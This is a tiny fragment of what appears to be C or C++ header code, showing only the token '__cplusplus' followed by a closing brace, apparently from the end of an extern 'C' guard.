__cplusplus }